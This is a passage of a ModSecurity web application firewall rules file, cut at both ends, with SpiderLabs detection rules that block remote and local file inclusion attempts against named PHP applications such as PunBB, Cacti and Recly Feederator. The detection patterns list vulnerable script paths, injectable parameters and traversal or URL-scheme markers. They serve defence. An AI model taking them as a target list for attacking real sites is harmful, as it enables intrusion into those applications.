Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008871) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpFan init.php Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008871,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpFan init.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32335'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:includepath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpFan init.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008899) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Pie RSS module lib parameter remote file inclusion SecRule REQUEST_LINE "@contains /lib/action/rss.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008899,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Pie RSS module lib parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,32465'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:lib/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Pie RSS module lib parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003691) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Pixaria Gallery Remote Inclusion Attempt -- psg.smarty.lib.php cfg sys base_path SecRule REQUEST_LINE "@contains /psg.smarty.lib.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003691,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS Pixaria Gallery Remote Inclusion Attempt -- psg.smarty.lib.php cfg sys base_path',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/1390'" SecRule &TX:'/RFI.*ARGS:cfg[sys][base_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Pixaria Gallery Remote Inclusion Attempt -- psg.smarty.lib.php cfg sys base_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003702) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Pixaria Gallery Remote Inclusion class.Smarty.php cfg sys base_path SecRule REQUEST_LINE "@contains /resources/includes/class.Smarty.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003702,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS Pixaria Gallery Remote Inclusion class.Smarty.php cfg sys base_path',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3733'" SecRule &TX:'/RFI.*ARGS:cfg[sys][base_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Pixaria Gallery Remote Inclusion class.Smarty.php cfg sys base_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2002815) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Plume CMS prepend.php Remote File Inclusion attempt SecRule REQUEST_LINE "@contains /prepend.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002815,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS Plume CMS prepend.php Remote File Inclusion attempt',tag:'web-application-attack',tag:'bugtraq,16662'" SecRule QUERY_STRING|REQUEST_BODY "@contains _px_config[manager_path]=" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:_px_config\x5bmanager_path\x5d=(https?|ftps?|php)\:)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Plume CMS prepend.php Remote File Inclusion attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010466) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PointComma pctemplate.php pcConfig Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /includes/classes/pctemplate.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010466,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS PointComma pctemplate.php pcConfig Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/pointcomma-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:pcConfig[smartyPath]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PointComma pctemplate.php pcConfig Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003371) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Portail Includes.php remote file include SecRule REQUEST_LINE "@contains /includes/includes.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003371,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Portail Includes.php remote file include',tag:'web-application-attack',tag:'bugtraq,22361'" SecRule QUERY_STRING|REQUEST_BODY "(?i:site_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Portail Includes.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /footer.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009659,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28421'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:settings[footer] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009660) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /header.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009660,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28421'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:settings[header] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009898) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Pragyan CMS form.lib.php sourceFolder Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /cms/modules/form.lib.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009898,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Pragyan CMS form.lib.php sourceFolder Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,30235'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:sourceFolder/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Pragyan CMS form.lib.php sourceFolder Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010276) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ProdLer prodler.class.php sPath Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /include/prodler.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010276,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ProdLer prodler.class.php sPath Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule &TX:'/RFI.*ARGS:sPath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ProdLer prodler.class.php sPath Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008880) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PunBB Functions_navlinks.php pun_user language Parameter Local File Inclusion SecRule REQUEST_LINE "@contains functions_navlinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008880,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PunBB Functions_navlinks.php pun_user language Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32360'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:pun_user[language]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PunBB Functions_navlinks.php pun_user language Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008881) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PunBB profile_send.php pun_user language Parameter Local File Inclusion SecRule REQUEST_LINE "@contains profile_send.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008881,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PunBB profile_send.php pun_user language Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32360'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:pun_user[language]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PunBB profile_send.php pun_user language Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008882) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PunBB viewtopic_PM-link.php pun_user language Parameter Local File Inclusion SecRule REQUEST_LINE "@contains viewtopic_PM-link.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008882,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PunBB viewtopic_PM-link.php pun_user language Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32360'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:pun_user[language]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PunBB viewtopic_PM-link.php pun_user language Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009502) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /server_request.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009502,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,27945'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:CONFIG[gameroot]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009503) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /server_request.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009503,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,27945'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:CONFIG[gameroot] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009504) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /qlib/smarty.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009504,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,27945'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:CONFIG[gameroot]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009505) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /qlib/smarty.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009505,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,27945'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:CONFIG[gameroot] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009746) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /qte_web.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009746,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:qte_web_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009723) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /qte_web.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009723,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:qte_web_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009724) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS QuickTeam qte_init.php qte_root Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /bin/qte_init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009724,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS QuickTeam qte_init.php qte_root Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:qte_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS QuickTeam qte_init.php qte_root Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009788) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RSS-aggregator display.php path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /display.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009788,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS RSS-aggregator display.php path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,29873'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RSS-aggregator display.php path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010097) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RaXnet Cacti top_graph_header.php config Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /include/top_graph_header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010097,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS RaXnet Cacti top_graph_header.php config Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,14030'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config[library_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RaXnet Cacti top_graph_header.php config Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009101) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS REALTOR define.php Remote File Inclusion SecRule REQUEST_LINE "@contains /define.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009101,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS REALTOR define.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,33227'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:INC_DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS REALTOR define.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009059) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recly Feederator add_tmsp.php mosConfig_absolute_path parameter remote file inclusion SecRule REQUEST_LINE "@contains /tmsp/add_tmsp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009059,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Recly Feederator add_tmsp.php mosConfig_absolute_path parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,32194'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recly Feederator add_tmsp.php mosConfig_absolute_path parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009060) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recly Feederator edit_tmsp.php mosConfig_absolute_path parameter remote file inclusion SecRule REQUEST_LINE "@contains /tmsp/edit_tmsp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009060,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Recly Feederator edit_tmsp.php mosConfig_absolute_path parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,32194'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recly Feederator edit_tmsp.php mosConfig_absolute_path parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009061) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recly Feederator subscription.php GLOBALS mosConfig_absolute_path parameter remote file inclusion SecRule REQUEST_LINE "@contains /tmsp/subscription.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009061,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Recly Feederator subscription.php GLOBALS mosConfig_absolute_path parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,32194'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[mosConfig_absolute_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recly Feederator subscription.php GLOBALS mosConfig_absolute_path parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009062) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recly Feederator tmsp.php mosConfig_absolute_path parameter remote file inclusion SecRule REQUEST_LINE "@contains /tmsp/tmsp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009062,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Recly Feederator tmsp.php mosConfig_absolute_path parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,32194'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recly Feederator tmsp.php mosConfig_absolute_path parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009466) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recly Competitions Component add.php GLOBALS Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/competitions/add.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009466,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Recly Competitions Component add.php GLOBALS Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32192'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[mosConfig_absolute_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recly Competitions Component add.php GLOBALS Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009467) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recly Competitions Component competitions.php GLOBALS Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/competitions/competitions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009467,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Recly Competitions Component competitions.php GLOBALS Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32192'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[mosConfig_absolute_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recly Competitions Component competitions.php GLOBALS Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009468) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recly Competitions Component settings.php mosConfig_absolute_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/settings/settings.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009468,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Recly Competitions Component settings.php mosConfig_absolute_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32192'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recly Competitions Component settings.php mosConfig_absolute_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011254) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Redaxo CMS index.inc.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /include/addons/version/pages/index.inc.php" 